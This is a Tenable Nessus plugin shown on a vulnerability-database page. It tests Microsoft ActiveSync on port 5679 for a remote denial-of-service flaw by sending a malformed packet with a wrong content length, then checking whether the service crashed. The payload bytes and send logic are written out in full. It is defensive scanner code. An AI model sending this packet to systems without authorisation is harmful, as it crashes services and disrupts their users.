Lucene search
K

Microsoft ActiveSync WideCharToMultiByte() Function NULL Dereference Remote DoS

🗓️ 22 Mar 2003 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 18 Views

Remote denial of service vulnerability in Microsoft ActiveSync via malformed packet exploitation.

Code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(11435);
 script_version ("1.13");
 script_bugtraq_id(7150);
 
 script_name(english:"Microsoft ActiveSync WideCharToMultiByte() Function NULL Dereference Remote DoS");
 script_summary(english:"Tests for the overflow in ActiveSync"); 
 
 script_set_attribute(attribute:"synopsis", value:
"The remote host contains a data synchronization program that is
affected by a remote denial of service attack." );
 script_set_attribute(attribute:"description", value:
"The remote service (probably ActiveSync) could be crashed
by sending it a malformed packet advertising a wrong content-length.

An attacker may use this flaw to disable this service remotely. It is
not clear at this time if this vulnerability can be used to execute
arbitrary code on this host, although it is a possibility." );
 script_set_attribute(attribute:"solution", value:
"There is no known solution at this time." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 
 script_set_attribute(attribute:"plugin_publication_date", value: "2003/03/22");
 script_cvs_date("Date: 2018/08/08 12:52:14");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 script_category(ACT_DESTRUCTIVE_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
 script_family(english:"Windows");
 script_require_ports(5679);
 exit(0);
}


include('global_settings.inc');
include('misc_func.inc');

port = 5679;
if (! get_port_state(port)) exit(0, "Port "+port+" is closed.");

 str = raw_string(0x06, 0x00, 0x00, 0x00,
    		 0x24, 0x00, 0x00, 0x00) + crap(124);


soc = open_sock_tcp(port);
if (! soc) exit(1, "Cannot connect to TCP port "+port+".");

 send(socket:soc, data:str);
 r = recv(socket:soc, length:1024);
 close(soc);

if (service_is_dead(port: port, exit: 1) > 0)
  security_warning(port);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation